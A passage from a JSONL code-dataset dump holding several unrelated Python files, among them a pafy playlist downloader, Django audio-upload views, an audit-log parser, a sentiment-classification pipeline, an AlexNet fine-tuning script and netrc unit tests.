checking for acceptance, because\n # strictly speaking 0.4299... is smaller than 0.43.\n reserve = 0.02\n _min = 0.43 + reserve - 1e-4\n _max = 0.44 + reserve + 1e-4\n\n results = self.extract_results()\n n_level_satisfied = sum(\n 1 for x in results['storage.HQ.H'] if _min <= x <= _max)\n q_pump_integral = sum(results['Q_pump'])\n q_pump_sum_changes = np.sum(np.diff(results['Q_pump'])**2)\n self.intermediate_results.append(\n (priority, n_level_satisfied, q_pump_integral, q_pump_sum_changes))\n\n def post(self):\n # Call super() class to not overwrite default behaviour\n super().post()\n for priority, n_level_satisfied, q_pump_integral, q_pump_sum_changes \\\n in self.intermediate_results:\n print('\\nAfter finishing goals of priority {}:'.format(priority))\n print('Level goal satisfied at {} of {} time steps'.format(\n n_level_satisfied, len(self.times())))\n print('Integral of Q_pump = {:.2f}'.format(q_pump_integral))\n print('Sum of squares of changes in Q_pump: {:.2f}'.format(q_pump_sum_changes))\n\n # Any solver options can be set here\n def solver_options(self):\n options = super().solver_options()\n solver = options['solver']\n options[solver]['print_level'] = 1\n return options\n\n\n# Run\nrun_optimization_problem(Example)\n","sub_path":"goal_programming_reserve/src/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"487551413","text":"import random\nimport string\nimport threading\nfrom queue import Queue\nimport pafy\nimport time\nimport os\n\ncounter = 0\ndirectory = \"C:/Users/morit_000/Desktop/TubeCast\"\n\n# lock to serialize console output\nlock = threading.Lock()\n\n#prints all Title and AudioLink of Profile\ndef printAudioDetail(item):\n p = item\n try:\n best = p.getbestaudio(preftype=\"m4a\")\n title = best.title[:].replace(\":\", \"_\")\n\n filepath = directory + \"/\"+title+\".\" + best.extension\n #print(\"Check: \"+filepath)\n best.download(filepath)\n print(filepath)\n except Exception as err:\n print(err)\n print(filepath)\n #print(p.title 
+\" \"+ err)\n q.put(p)\n #print(p.title)\n #print(threading.current_thread().name, best.url)\n filepath = directory + best.title + \".\" + best.extension\n\n\n#worker method, thread method\ndef worker():\n time.sleep(1)\n while True:\n item = q.get()\n printAudioDetail(item)\n #print(item.title)\n\n q.task_done()\n\n\nplaylist = pafy.get_playlist(\"PLpaD0ybYH0S1yYJAGHhHgJE46oEfGfl2C\")\nvideos = playlist['items']\n\n#Threadpool initialization, number of Threads\nfor i in range(100):\n t = threading.Thread(target=worker)\n t.daemon = True\n t.start()\n\n#fill Queue, gets processed by the Threads\nq = Queue()\nfor video in videos:\n q.put(video['pafy'])\n counter += 1\nq.join()\n\n#if method stops before threads --> Exception\n#time.sleep(5)\n\nprint(\"Ergebnis \"+counter.__str__())\n\n","sub_path":"old_files/mutlithread.py","file_name":"mutlithread.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"584875358","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.models import User as djUser\nfrom user.models import User, Author, Image\nfrom mysite import settings\nfrom .forms import UploadFileForm\nimport os, sys, json\nfrom .models import Audio\ndef handle_uploaded_file(f):\n with open(os.path.join(settings.MEDIA_ROOT, f.name), 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\nclass Playlist(View):\n @method_decorator(login_required(login_url='/login/'))\n def get(self, request):\n user = request.user\n playlist = user.customUser.audio.all()\n return render(request, \"playlist.html\", {'playlist' : playlist, 'you': request.user.customUser, 'user' : None})\n @method_decorator(login_required(login_url='/login/'))\n def post(self, request):\n user = request.user\n params = request.POST\n try:\n xhr = request.POST['xhr']\n except:\n xhr = False\n response_dict = {}\n print(request.POST)\n if 'add' in params:\n try:\n user.customUser.audio.add(Audio.objects.get(id=int(params['add'])))\n response_dict = {'status': 'ok'}\n except:\n print(\"Unexpected error:\", sys.exc_info())\n response_dict = {'status': 'error'}\n if xhr == 'true':\n return HttpResponse(json.dumps(response_dict), content_type='application/javascript')\n return self.get(request)\n else:\n try:\n author = Author.objects.get(name = params['author'])\n except:\n author = Author.objects.create(name = params['author'], information = '')\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n handle_uploaded_file(request.FILES['audio'])\n a = Audio.objects.create(text = params['post_text'],\n author = author,\n name = params['name'],\n file = request.FILES['audio'],\n type = [params['type']],\n duration = '00:00:00')\n user.customUser.audio.add(a)\n a.save()\n return self.get(request)\nclass Audios_id(View):\n def post(self, request, path):\n user = request.user\n params = request.POST\n try:\n xhr = request.POST['xhr']\n except:\n xhr = False\n response_dict = {}\n print(request.POST)\n if 'add' in params:\n try:\n user.customUser.audio.add(Audio.objects.get(id=int(params['add'])))\n response_dict = {'status': 'ok'}\n except:\n print(\"Unexpected error:\", sys.exc_info())\n response_dict = {'status': 'error'}\n if xhr == 'true':\n return HttpResponse(json.dumps(response_dict), 
content_type='application/javascript')\n return self.get(request, path)\n def get(self, request, path):\n\n user = User.objects.get(id=int(path))\n print(request)\n return render(request, \"playlist.html\", {'playlist' : user.audio.all(),\n 'user' : user,\n 'you': request.user.customUser})\n # Create your views here.\n","sub_path":"audio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"532106046","text":"#!/usr/bin/env python3\n\nimport mksippscn\nimport codesamples\n\ndef testUnique(e, description):\n print(' >>>>', description)\n print('{} values:'.format(e))\n uniq = set()\n variables = vars(e)\n for var in variables:\n if not var.startswith('__') and not callable(variables[var]):\n if variables[var] not in uniq:\n uniq.add(variables[var])\n print('{:15} = {:2}'.format(var, variables[var]))\n else:\n print('{:15} = {:2} !! ERROR !! Already in use!'.format(var, variables[var]))\n rc = 1\n\ndef testNeedFormat():\n print('Not need format string test OK') if not codesamples.needFormat('not need format') \\\n else print('Not need format string test FAILED')\n print('Need some format string test OK') if codesamples.needFormat('need {some} format') \\\n else print('Need some format string test FAILED')\n print('Need format string test OK') if codesamples.needFormat('need {} format') \\\n else print('Need some format string test FAILED')\n\ndef testStatusLine(reasons, customText):\n for r in reasons:\n print('codesamples.makeStatusLine({}): '.format(r), codesamples.makeStatusLine(r))\n for r in reasons:\n print('codesamples.makeStatusLine({}, {}): '.format(r, customText), codesamples.makeStatusLine(r, customText))\n\nif __name__ == '__main__':\n testUnique(mksippscn.Errors, 'Check for unique error codes')\n testNeedFormat()\n testStatusLine([200,302,404,503,606,666,999,'string'], 'My Custom Reason')\n","sub_path":"selftest.py","file_name":"selftest.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"266076441","text":"# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.core.urlresolvers import reverse, NoReverseMatch\nfrom django.template.loader import render_to_string\nfrom django.utils.safestring import mark_safe\nfrom django_jinja import library\nfrom jinja2 import contextfunction\n\n\nregister = template.Library()\n\n\n@library.global_function\n@contextfunction\n@register.simple_tag(takes_context=True)\ndef pagination(context, page_obj=None, page_kwarg='page'):\n\tpage_obj = page_obj or context['page_obj']\n\tctx = {\n\t\t'page_obj': page_obj,\n\t\t'page_kwarg': page_kwarg,\n\t\t'resolver_match': context['request'].resolver_match,\n\t\t'request': context['request'],\n\t}\n\treturn mark_safe(render_to_string(\"paginator/paginator.html\", ctx))\n\n\n@library.global_function\n@contextfunction\n@register.simple_tag(takes_context=True)\ndef pager_url(context, page_num):\n\trequest = context['request']\n\tresolver_match = context['resolver_match']\n\tpage_kwarg = context['page_kwarg']\n\tkwargs = resolver_match.kwargs.copy()\n\tkwargs[page_kwarg] = page_num\n\ttry:\n\t\turl_args = '?' 
+ request.GET.urlencode() if request.GET else ''\n\t\treturn reverse(resolver_match.view_name, args=resolver_match.args, kwargs=kwargs) + url_args\n\texcept NoReverseMatch:\n\t\tget = request.GET.copy()\n\t\tget[page_kwarg] = page_num\n\t\tbase_url = reverse(resolver_match.view_name, args=resolver_match.args, kwargs=resolver_match.kwargs)\n\t\treturn base_url + '?' + get.urlencode()\n\n","sub_path":"paginator/templatetags/paginator.py","file_name":"paginator.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"583692524","text":"import numpy as np\ndef writejsfield(fid,name,variable,nods):\n#WRITEJSFIELD - write variable to javascript file \n#\n# Usage:\n# writejsfield(fid,name,variable)\n#\n\t#write array:\n\t#if not isinstance(variable, list):\n\tif type(variable[0])==np.float64:\n\t\tfid.write('\\n'.format(name))\n\t\tfid.write('{0}=['.format(name))\n\t\tfor i in xrange(0, nods-1):\n\t\t\tfid.write('{0},'.format(variable[i]))\n\t\tfid.write('{0}];\\n'.format(variable[-1]))\n\t\tfid.write('\\n')\n\telse:\n\t\t#multi-sized array: \n\t\tfid.write('\\n'.format(name))\n\t\tfid.write('{0}=[]\\n'.format(name))\n\t\tfor i in xrange(0, len(variable[2])):\n\t\t\tfid.write('{0}[\"{1}\"]=['.format(name,i))\n\t\t\tfor j in xrange(1, nods-1):\n\t\t\t\tfid.write('{0},'.format(variable[j][i]))\n\t\t\tfid.write('{0}];\\n'.format(variable[-1][i]))\n\t\tfid.write('\\n')\n","sub_path":"issm/writejsfield.py","file_name":"writejsfield.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"21050125","text":"import re\r\nimport os\r\nimport json\r\nimport sys \r\nimport gzip\r\n\r\nimport configparser\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\n# types represented by 1 byte\r\nint10Types = [ 'syscall', 'ppid', 'pid', 'auid', 'uid', 'gid', 'euid', 'suid', 'fsuid', 'egid', 'sgid', 'fsgid', 'items']\r\n# 64 bit byte strings\r\nint16Types = [ \"arch\" ,\"a0\", \"a1\", \"a2\", \"a3\"]\r\nfloatTypes = [\"timestamp\"]\r\nrx = re.compile(\"audit.(?P.*):(?P.*).: arch=(?P.*) syscall=(?P\\d+) (?:success=(?P.*) exit=(?P.*))?[ ]*a0=(?P.*) a1=(?P.*) a2=(?P.*) a3=(?P.*) items=(?P.*) ppid=(?P.*) pid=(?P.*) auid=(?P.*) uid=(?P.*) gid=(?P.*) euid=(?P.*) suid=(?P.*) fsuid=(?P.*) egid=(?P.*) sgid=(?P.*) fsgid=(?P.*) tty=(?P.*) ses=(?P.*) comm=(?P.*) exe=(?P.*)[ ]*(?:subj=(?P.*))? 
key=(?P.*)\")\r\ncompressLvl = 4\r\n\r\n\r\nsep =\"/\"\r\n# set up from config file\r\nname = \"\"\r\nconfig = configparser.ConfigParser()\r\nconfig.read('vbox.ini')\r\n\r\nmaster_vm = config['userVar']['master_vm']\r\ntime = config['userVar']['time'] \r\ncparams = config['linux']\r\n\r\nif os.name == 'nt':\r\n cparams = config['windows']\r\n sep = \"//\"\r\n\r\n\r\nhome_dir = cparams['home_dir']\r\ntest_files = cparams['test_files']\r\nbad_files = cparams['bad_files']\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef appendLogs(directoryPath,finalName):\r\n logs, numLogs = appendLogFiles(directoryPath)\r\n finalOutput = gzip.open(finalName,\"wb\",compresslevel=compressLvl)\r\n for i in range(numLogs,0,-1):\r\n logName = directoryPath+sep+logs[i-1]\r\n print(logName)\r\n dataParseRaw(logName,finalOutput)\r\n finalOutput.close()\r\n\r\ndef dataParseRaw(filePath,finalOutput):\r\n f = open(filePath,\"r\")\r\n wtf = f.readlines()\r\n for line in wtf:\r\n if line[5:12] == \"SYSCALL\":\r\n result = re.search(rx,line)\r\n if result is not None:\r\n result = result.groupdict()\r\n for x in int10Types:\r\n result[x] = int(result[x])\r\n\r\n for x in int16Types:\r\n result[x] = int(result[x],16)\r\n \r\n if result['exit'] is not None:\r\n result['exit'] = int(result['exit'])\r\n result['timestamp'] = float(result['timestamp'])\r\n j = json.dumps(result) + \"\\n\"\r\n j = j.encode('utf-8')\r\n finalOutput.write(j)\r\n\r\n \r\n\r\n\r\n\r\ndef appendLogFiles(directoryPath):\r\n try:\r\n onlyfiles = [f for f in listdir(directoryPath) if isfile(join(directoryPath, f))]\r\n onlyfiles.sort()\r\n return onlyfiles, len(onlyfiles)\r\n except FileNotFoundError:\r\n print(\"Please use a valid executable name\")\r\n sys.exit(1)","sub_path":"vBoxTest/basic/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"619232563","text":"import os\nimport sys\nimport numpy as np\nnp.random.seed(42) # for reproducibility\n\nimport pandas as pd\nimport re\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.pipeline import Pipeline\n\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import SnowballStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n# import xgboost as xgb\n\n# Constants\nTARGET = 'sentiment'\nFEATURE = 'review_body'\nFEATURES = [FEATURE]\n\n # Load data from single CSV or from multiple CSVs in multiple folders #################\n\ndef load_data(path_to_dir):\n \"\"\"Load data from single CSV or from multiple CSVs in multiple folders\"\"\"\n if '.csv' in path_to_dir:\n print('\\nReading {}...'.format(path_to_dir))\n df = pd.read_csv(path_to_dir)\n return df\n else:\n print('Processing files in {}...'.format(path_to_dir))\n # Get all non-zip folders/files in dir\n names = os.listdir(path_to_dir)\n folders = [name for name in names if not name.endswith('.zip')] # Remove names found for zips\n print('\\tNon-zip folders/files found in {}: {}'.format(path_to_dir, folders))\n # From each folder, read all CSV files into Pandas df\n dfs = []\n for folder in folders:\n try: \n data_dir = 
path_to_dir + '/' + folder + '/'\n csv_filenames = os.listdir(data_dir) \n for name in csv_filenames:\n df = pd.read_csv(data_dir + name)\n df['csv'] = name\n df['folder'] = folder\n dfs.append(df)\n except NotADirectoryError:\n print('\\tSkipping (not a directory):', data_dir)\n df_all = pd.concat(dfs, ignore_index=True)\n return df_all\n \n############################################################\n\n\n# Functions for data cleaning & prep ####################\n\ndef add_city_col(df):\n \"\"\"Add 'city' column from 'url'\"\"\"\n df['city'] = df['url'].str.split('-', expand=True).iloc[:, -2]\n return df\n\ndef add_loc_col(df):\n \"\"\"Add clean location column 'loc' from 'city'\"\"\"\n df['loc'] = df['city']\n locs_dict = {'New_York':'New_York', 'Tokyo':'Tokyo', 'Phuket':'Thailand', 'Bali':'Bali', \\\n 'Cuba':'Cuba', 'Domi':'Dominican_Republic', 'Dubai':'Dubai', 'Cayo_Guillermo':'Cuba', \\\n 'Pattaya':'Thailand', 'Uvero_Alto_Punta_Cana_La_Altagracia_Province_Do':'Dominican_Republic',\\\n 'Krabi':'Thailand', 'Chiang_Mai':'Thailand', 'Khao_Lak_Phang_Nga_Province':'Thailand',\\\n 'Bangkok':'Thailand'}\n for loc in locs_dict:\n df.loc[df[df['city'].str.contains(loc)].index, 'loc'] = locs_dict[loc]\n return df\n\ndef clean_usernames(df):\n \"\"\"Add 'user_name_clean' column from 'user_name'\"\"\"\n df['user_name_clean'] = df['user_name'].str.split('<', expand=True).iloc[:, 0]\n return df\n\n#######################################################\n\n\n# Fully clean & prepare data #########################\n\ndef clean_and_prep(df):\n \"\"\"Fully clean & prepare data\"\"\"\n print('Cleaning data...')\n # # Change 'review_date' to datetime type\n # df['review_date'] = pd.to_datetime(df['review_date'])\n\n # Drop duplicate rows\n df = df.drop_duplicates()\n # Fill nulls for 'user_location' with 'n/a'\n df = df.fillna({'user_location': 'n/a'})\n\n # # Add col 'review_length' from 'review_body'\n # df['review_length'] = df['review_body'].str.len()\n\n # Get 'city' from 'url'\n df = add_city_col(df)\n # Get clean location 'loc' from city col\n df = add_loc_col(df)\n\n # # Clean 'user_name'\n # df = clean_usernames(df)\n\n # Add 'sentiment' column mapped by 'rating'\n df['sentiment'] = df['rating'].map({1: 'negative', 2: 'negative', 3: 'neutral', 4:'positive', 5:'positive'})\n \n# # Add 'sentiment' column mapped by 'sentiment'\n# df['polarity'] = df['sentiment'].map({'negative': 0, 'neutral': 0.5, 'positive': 1})\n# # Add 'sentiment_int' column mapped by 'sentiment'\n# df['sentiment_int'] = (df['polarity'] * 2).astype(int)\n# # Move 'sentiment' col to be last\n# last_col = df.pop('sentiment')\n# df.insert(df.shape[1], 'sentiment', last_col)\n return df\n\n#######################################################\n\n\n### NOTE: Train-test-val split and train undersampling below use random state/seed=42 \n### for reproducibility.\n\n# Train-test-val split ###################################\n\ndef train_test_val_split(df, target=TARGET):\n \"\"\"Train-test-val split - shuffled, stratified, 80:20 ratios --> 64/20/16 train/test/val\"\"\"\n train_df, test_df = train_test_split(df, test_size=0.2, shuffle=True, \\\n stratify=df[target], random_state=42)\n train_df, val_df = train_test_split(train_df, test_size=0.2, shuffle=True, \\\n stratify=train_df[target], random_state=42)\n\n print('\\tTrain: {}, Test: {}, Val: {}'.format(train_df.shape[0], test_df.shape[0], val_df.shape[0]))\n \n return train_df, test_df, val_df\n\n#######################################################\n\n# Undersample train due to 
class imbalance ###################################\n\ndef undersample_train(train_df, target=TARGET):\n    \"\"\"Undersample train due to class imbalance\"\"\"\n    y_train = train_df[target]\n    # Get classes and counts\n    unique, counts = np.unique(y_train, return_counts=True)\n\n    # Determine majority, middle, and minority classes\n    majority_class = unique[np.argmax(counts)]\n    minority_class = unique[np.argmin(counts)]\n    mid_class = (set(unique) - set([majority_class, minority_class])).pop()\n    print('\\tMajority Class: {}, Middle Class: {}, Minority Class: {}'.format(majority_class, mid_class, minority_class))\n\n    # Get indices per class\n    class_indices = dict.fromkeys([majority_class, mid_class, minority_class])\n    for key in class_indices:\n        class_indices[key] = train_df[train_df[target]==key].index\n        print('\\t\\tNumber {} in train: {}'.format(key, class_indices[key].shape[0]))\n\n    # Randomly under-sample majority and middle class indices to get new under-sampled train df\n    np.random.seed(42)\n    rand_maj_indices = np.random.choice(class_indices[majority_class], class_indices[minority_class].shape[0], replace=False)\n    rand_mid_indices = np.random.choice(class_indices[mid_class], class_indices[minority_class].shape[0], replace=False)\n    undersample_indices = np.concatenate([class_indices[minority_class], rand_mid_indices, rand_maj_indices])\n\n    train_df_us = train_df.loc[undersample_indices,:]\n    print('\\tFinal undersampled train size:', train_df_us.shape[0])\n    return train_df_us\n\n#######################################################\n\n\n# Complete preprocessing, splitting, undersampling #################################################\n\ndef preprocess_split_undersample(path):\n    \"\"\"Complete preprocessing, splitting, undersampling\"\"\"\n    train_df, test_df, val_df = preprocess_split(path)\n\n    train_df_us = undersample_train(train_df)\n    \n    return train_df_us, test_df, val_df\n\n############################################################\n\n\n# Complete preprocessing, train-test-val split #################################################\n\ndef preprocess_split(path):\n    \"\"\"Complete preprocessing, train-test-val split\"\"\"\n    # Data preprocessing\n    df = load_data(path)\n    df = clean_and_prep(df)\n\n    # Train/test/val split\n    print('\\nSplitting data into train/test/val...')\n    train_df, test_df, val_df = train_test_val_split(df)\n\n    return train_df, test_df, val_df\n\n############################################################\n\n\n# NLP ##################################################\n\ndef my_tokenizer(str_input):\n    \"\"\"Tokenize with NLTK's SnowballStemmer, remove non-alpha chars\"\"\"\n    stemmer = SnowballStemmer('english')\n    stemmed_stopwords = set_stopwords()\n\n    tokenizer = RegexpTokenizer(r\"[a-zA-Z]+\")\n    tokens = tokenizer.tokenize(str_input)\n\n    words = [stemmer.stem(word) for word in tokens if word not in stemmed_stopwords]\n    return words\n\ndef set_stopwords():\n    \"\"\"Snowball-Stem English stopwords, \n    list found at http://www.textfixer.com/resources/common-english-words.txt\"\"\"\n    stemmer = SnowballStemmer('english')\n    # each fragment below ends with a comma, otherwise the concatenation fuses\n    # the last word of one line with the first word of the next (e.g. 'anyare')\n    STOPWORDS = \"a,able,about,across,after,all,almost,also,am,among,an,and,any,\"+\\\n        \"are,as,at,be,because,been,but,by,can,could,dear,did,do,does,either,\"+\\\n        \"else,ever,every,for,from,get,got,had,has,have,he,her,hers,him,his,\"+\\\n        \"how,however,i,if,in,into,is,it,its,just,least,let,like,likely,may,\"+\\\n        \"me,might,most,must,my,neither,no,of,off,often,on,only,or,other,our,\"+\\\n        \"own,rather,said,say,says,she,should,since,so,some,than,that,the,their,\"+\\\n        \"them,then,there,these,they,this,tis,to,too,twas,us,wants,was,we,were,\"+\\\n        \"what,when,where,which,while,who,whom,why,will,with,would,yet,you,your\"\n    STOPWORDS = STOPWORDS.split(',') \n    stemmed_stopwords = set([stemmer.stem(word) for word in STOPWORDS])\n    return stemmed_stopwords\n\ndef count_vectorize(texts):\n    stemmed_stopwords = set_stopwords()\n    # tokenize with my_tokenizer and filter the same stemmed stopwords it uses\n    count_vect = CountVectorizer(tokenizer=my_tokenizer, stop_words=list(stemmed_stopwords), max_features=5000)\n    matrix = count_vect.fit_transform(texts)\n    results = pd.DataFrame(matrix.toarray(), columns=count_vect.get_feature_names())\n    return results\n\ndef tfidf_cv(X, y, model, cv=5, scoring=['accuracy']):\n    clf = Pipeline([('tfidf', TfidfTransformer()), \\\n                    ('model', model)])\n    scores = cross_validate(clf, X, y, scoring=scoring, cv=cv, return_train_score=True)\n    print('\\t\\tScores: {}'.format(scores))\n    return scores\n\n############################################################\n\n\nif __name__ == \"__main__\":\n    try: \n        path = sys.argv[1]\n        action = sys.argv[2]\n    except IndexError:\n        print('Please specify path to data files and action (\"model\").')\n        sys.exit()\n\n    # Data preprocessing\n    train_df_us, test_df, val_df = preprocess_split_undersample(path)\n\n    X_train_us = train_df_us[FEATURE].to_list()\n    y_train_us = train_df_us[TARGET].to_numpy()\n\n    print('\\nGetting bag of words for train data...')\n    X_train_us_vect = count_vectorize(X_train_us)\n\n    if action == 'model': \n        # Modeling\n        print('\\nStarting modeling...')\n\n        # xgboost is only needed on the modeling path, so import it here\n        import xgboost as xgb\n\n        lr = LogisticRegression(multi_class='multinomial', solver='newton-cg')\n        mnb = MultinomialNB()\n        rf = RandomForestClassifier()\n        gb = GradientBoostingClassifier()\n        xc = xgb.XGBClassifier()\n\n        # models = dict.fromkeys([lr]) # single model test\n        models = dict.fromkeys([lr, mnb, rf, gb, xc])\n\n        for key in models:\n            print('\\n\\tFitting {}...'.format(key.__class__.__name__))\n            scores = tfidf_cv(X_train_us_vect, y_train_us, key, cv=5)\n            models[key] = scores\n            print('\\t\\tAverage train accuracy:', np.mean(models[key]['train_accuracy']))\n            print('\\t\\tAverage test accuracy:', np.mean(models[key]['test_accuracy']))\n        print('\\n')\n\n    else:\n        print('Unknown action:', action)","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"369480443","text":"import pickle\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nfrom alexnet import AlexNet\nimport time\nimport skimage.transform\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#%% Function definitions\ndef evaluate(X_data, y_data,sess,logits,one_hot_y,BATCH_SIZE):\n    '''\n    logits: the raw output of the network\n    one_hot_y: the label input after the one-hot transformation\n    '''\n    num_examples = len(X_data)\n    total_accuracy = 0\n    #build the accuracy-check ops\n    correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))\n    accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n    for offset in range(0, num_examples, BATCH_SIZE):\n        batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]\n        batch_x = ProcessFigs(batch_x)\n        accuracy = sess.run(accuracy_operation, feed_dict={x_RGB: batch_x, y: batch_y})\n        total_accuracy += (accuracy * len(batch_x))\n    return total_accuracy / num_examples\n\ndef ProcessFigs(Figs):\n    '''\n    Convert the input image batch to float32, resize to 227x227, swap the R and B\n    channels, and zero-centre each image\n    '''\n    FigOut = 
np.zeros([np.shape(Figs)[0],227,227,3])\n for Counter in range(np.shape(Figs)[0]):\n AFig = Figs[Counter,:,:,:]\n AFig = skimage.transform.resize(AFig,[227,227],preserve_range = True)\n AFig = AFig - np.mean(AFig)\n AFig[:, :, 0], AFig[:, :, 2] = AFig[:, :, 2], AFig[:, :, 0]\n FigOut[Counter,:,:,:] = AFig[np.newaxis,:,:,:]\n return FigOut\n#TODO: Load traffic signs data.\n#%%调入存储的数据文件\npickle_file = './train.p'\nwith open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f)\n \n X = pickle_data['features']\n y = pickle_data['labels']\n \n del pickle_data # Free up memory\n \n# TODO: Split data into training and validation sets.\n#%%将数库分裂为训练集和验证集\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.15)\ndel X\ndel y\n\n#%%创建运行场景\nsess = tf.Session()\n\n# TODO: Define placeholders and resize operation.\n#%% 设置图片格式转换层\nwith tf.name_scope('Transform_RGB'):\n x_RGB = tf.placeholder(tf.float64, (None, 227, 227, 3))\n x_RGB = tf.cast(x_RGB,tf.float32)\n\n# TODO: pass placeholder as first argument to `AlexNet`.\n#%% 与AlexNet连接,并设置反传信息中断层\nwith tf.name_scope('AlexNet'):\n fc7 = AlexNet(x_RGB, feature_extract=True)\n #fc7 = AlexNet(resized_x, feature_extract=True)\n # NOTE: `tf.stop_gradient` prevents the gradient from flowing backwards\n # past this point, keeping the weights before and up to `fc7` frozen.\n # This also makes training faster, less work to do!\n fc7 = tf.stop_gradient(fc7)\n\n# TODO: Add the final layer for traffic sign classification.\n#%%添加新加入的空白层等待训练并适配网络\nwith tf.name_scope('New_add1'):\n mu = 0\n sigma = 0.1\n weight8 = tf.Variable(tf.truncated_normal([4096,43],mean = mu, stddev = sigma),name = 'weight8')\n bias8 = tf.Variable(tf.zeros(43),name = 'bias8')\n Mux8 = tf.matmul(fc7,weight8)\n logits8 = tf.add(Mux8,bias8)\n \n\n# TODO: Define loss, training, accuracy operations.\nwith tf.name_scope('Train_price'):\n y = tf.placeholder(tf.uint8, (None))\n one_hot_y = tf.one_hot(y,43,dtype = tf.float32)\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits8)\n loss_operation = tf.reduce_mean(cross_entropy)\n \n# TODO: Train and evaluate the feature extraction model.\n#%%生成优化器\nrate = 0.001\noptimizer = tf.train.AdamOptimizer(learning_rate = rate)\n#主要,这里要指定训练的变量\ntraining_operation = optimizer.minimize(loss_operation,var_list = [weight8, bias8])\n\n\nEPOCHS = 50\nBATCH_SIZE = 128\n\n#执行优化过程\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nnum_examples = len(X_train)\nprint(\"Training...\")\nprint()\nfor i in range(EPOCHS):\n X_train, y_train = shuffle(X_train, y_train)\n StartTime = time.clock()\n for offset in range(0, num_examples, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = X_train[offset:end], y_train[offset:end]\n batch_x = ProcessFigs(batch_x)\n _,Out = sess.run([training_operation,loss_operation], feed_dict={x_RGB: batch_x, y: batch_y})\n print(Out)\n EndTime = time.clock()\n print(\"这是第{}次训练完成\".format(i+1))\n print(\"这次训练的使用时间:{}\".format(EndTime - StartTime))\n print(\"检测一下准确程度:\")\n validation_accuracy = evaluate(X_test,y_test,sess,logits8,one_hot_y,BATCH_SIZE)\n print(validation_accuracy)\n print(\"~~~~~~~~~~~~~~~~~~~~\")\n if validation_accuracy > 0.98:\n break\n\n\n\n","sub_path":"train_feature_extraction.py","file_name":"train_feature_extraction.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"6116898","text":"# coding=utf-8\n# Copyright 2014 Pants project contributors (see 
CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport re\nimport unittest\nfrom contextlib import contextmanager\n\nfrom mock import MagicMock, mock_open, patch\n\nfrom pants.util.netrc import Netrc\n\n\n@patch('os.path')\nclass TestNetrcUtil(unittest.TestCase):\n\n class MockOsPath(MagicMock):\n def __init__(self):\n super(TestNetrcUtil.MockOsPath, self).__init__()\n self.expanduser.return_value = '~/.netrc'\n self.exists.return_value = True\n\n def test_netrc_success(self, MockOsPath):\n with patch('pants.util.netrc.NetrcDb') as mock_netrc:\n instance = mock_netrc.return_value\n instance.hosts = {'host': ('user', 'user', 'passw0rd')}\n instance.authenticators.return_value = ('user', 'user', 'passw0rd')\n netrc = Netrc()\n netrc._ensure_loaded()\n\n def test_netrc_file_missing_error(self, MockOsPath):\n MockOsPath.exists.return_value = False\n netrc = Netrc()\n with self.assertRaises(netrc.NetrcError) as exc:\n netrc._ensure_loaded()\n assert str(exc.exception) == 'A ~/.netrc file is required to authenticate'\n\n def test_netrc_parse_error(self, MockOsPath):\n with self.netrc('machine test') as netrc:\n with self.assertRaises(netrc.NetrcError) as exc:\n netrc._ensure_loaded()\n assert re.search(r'Problem parsing', str(exc.exception))\n\n def test_netrc_no_usable_blocks(self, MockOsPath):\n with self.netrc('') as netrc:\n with self.assertRaises(netrc.NetrcError) as exc:\n netrc._ensure_loaded()\n assert str(exc.exception) == 'Found no usable authentication blocks in ~/.netrc'\n\n 